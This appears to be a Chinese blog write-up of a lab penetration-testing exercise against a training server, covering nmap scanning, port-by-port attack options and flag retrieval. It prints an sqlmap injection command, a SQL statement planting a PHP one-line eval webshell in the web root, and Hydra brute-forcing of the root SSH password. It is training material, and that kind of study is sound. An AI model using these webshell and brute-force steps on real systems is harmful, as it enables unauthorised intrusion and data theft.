Linux操作系统渗透测试

任务四:Linux操作系统渗透测试

任务环境说明:

  • 服务器场景:Linux2021
  • 服务器场景操作系统:Linux(版本不详)(关闭链接)
  1. 通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2021进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务版本信息字符串作为Flag值提交;

题目解析:

进行系统服务及版本的扫描--ànmap –sV 靶机

查找21端口VERSION信息-àflag:vsftpd 2.3.4

Nmap补充:

参数/*-*/:

-sV //扫描服务及版本

-sS //半开放式扫描

-sT //TCP同步扫描

-sU //UDP扫描(UDP为不可靠传输)

-sW //滑动窗口扫描

-sP //Ping扫描

-sL //列表扫描

-sR //RPC(135端口)扫描

-Pn //Ping扫描

-O //扫描操作系统

-A //全部扫描

-T[1-5] //扫描等级,等级越高扫描的速度快且东西全,但容易被FILEWALL(防火墙)拦截

-p //指定端口扫描

-n //禁止DNS反向解析

STATE状态:

  1. Opend 端口开放,发现这一点常常是端口扫描的主要目标。
  2. Closed 端口关闭,没有应用程序在其上监听,过一会扫描也许会开放。
  3. Filtered 端口被过滤,由于防火墙、路由器规则等阻止到达端口。
  4. openfiltered 开放或者过滤的,当无法确定端口是开放还是被过滤的
  5. closedfiltered 关闭或者被过滤的,nmap不能确定端口是关闭的还是被过滤的。

  1. 通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2021进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp文件的文件名称作为Flag值提交;

题目解析:

先通过观察靶机开放了哪些端口,再根据端口对应的漏洞进行渗透测试

靶机开放了21,22,80,111,139,445,3306这些端口

____________________________________________

21端口(FTP协议)àftp 靶机 //进行ftp连接

ftp>get 文件名 //下载文件到本地目录

22端口(SSH协议)àssh 靶机用户名@靶机IP //进行ssh连接

渗入靶机后à

cd 目录 //切换目录

ls //列出目录下的文件

scp 靶机用户名@靶机IP:/文件mulu /本地文件目录

/*下载靶机文件到本地*/

80端口(HTTP协议)à看见此端口开放,就说明有网页存在,则可进行Web一些列的渗透(例:一句话木马上传,SQL注入,xss跨站脚本等)

3306端口(Mysql数据库端口)à进行数据库连接

mysql –h 靶机 –u用户名 –p 密码

若即开放80又开放3306则:

进行sqlmap –u “网址” –dbs –batch /*sqlmap注入*/

和select ‘<?php @eval($_POST[“a”]);?>’ into outfile /var/www/html //网站根目录

上传一句话木马后,用菜刀进行连接,则可拿到flag

端口介绍:

20,21-FTP(文件传输)

22-SSH(远程连接)

23-TELNET(远程连接)

25-SMTP(邮件发送)

53-DNS(域名系统)

80-HTTP(网页)

110-POP3(邮件接收)

135-RPC(远程过程调用)

445-SMB(打印机共享)

3306-MYSQL(MYSQL数据库)

3389-RDP(远程桌面)

8080-HTTP(网页)

_______________________________________________

利用SSH,FTP端口时,先要想靶机的最高用户是哪个

这样在渗入靶机时可避免权限不够的问题,但利用3306MYSQL时,要使用SQL语句上传一句话木马(数据库的权限始终是最高的777权限)

________________________________

一句话木马:

<?php @eval($_POST[“密码”]);?>

在进行连接时,前提条件下是要知道靶机root用户的密码

密码爆破:

创建字典à

john –wordlist –rules –stdout >0.txt

Hydra爆破à

Hydra –l root –P 字典地址 端口(ssh)://靶机IP -vV

 

 

直接用九头蛇Hydra爆破它的最高权限Root用户

得到高亮的则是root的密码

提示:若ssh爆不成功,则可以试试其他端口的爆破

            

密码到手后直接ssh远程连接

ssh 用户名@靶机IP

pwd:查看当前目录

cd 目录:切换目录

ls :查看文件

ssh连上后直接cd到文件的目录,在ls列出文件

则得到文件

  1. 通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2021进行渗透测试,将该场景/var/www目录中唯一一个后缀为.bmp的图片文件中的英文单词作为Flag值提交;

下载文件:

Scp 用户名@靶机IP:/服务器的文件目录 /本地目录

上传文件:

Scp 文件名 用户名@靶机IP:/服务器目录

打开文件即可得到flag

 

  1. 通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2021进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件名称作为Flag值提交;

题目解析:

Ssh连接后,cd到/var/vsftpd目录下,ls查看文件

文件名即为flag

再利用scp下载本地查看即可

  1. 通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2021进行渗透测试,将该场景/var/vsftpd目录中唯一一个后缀为.docx文件的文件内容作为Flag值提交;

题目解析:

Ssh连接后,cd到/var/vsftpd目录下,ls查看文件

再利用scp下载本地查看即可

  1. 通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2021进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件名称作为Flag值提交;

题目解析:

Ssh连接后,cd到/home/guest目录下,ls查看文件

文件名即为flag

再利用scp下载本地查看即可

  1. 通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2021进行渗透测试,将该场景/home/guest目录中唯一一个后缀为.pdf文件的文件内容作为Flag值提交;

题目解析:

Ssh连接后,cd到/home/guest目录下,ls查看文件

再利用scp下载本地查看即可

  1. 通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2021进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件名称作为Flag值提交;

题目解析:

Ssh连接后,cd到/root目录下,ls查看文件

文件名即为flag

再利用scp下载本地查看即可

  1. 通过本地PC中渗透测试平台Kali2.0对服务器场景Linux2021进行渗透测试,将该场景/root目录中唯一一个后缀为.txt文件的文件内容作为Flag值提交。

题目解析:

Ssh连接后,cd到/root目录下,ls查看文件

再利用scp下载本地查看即可

  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值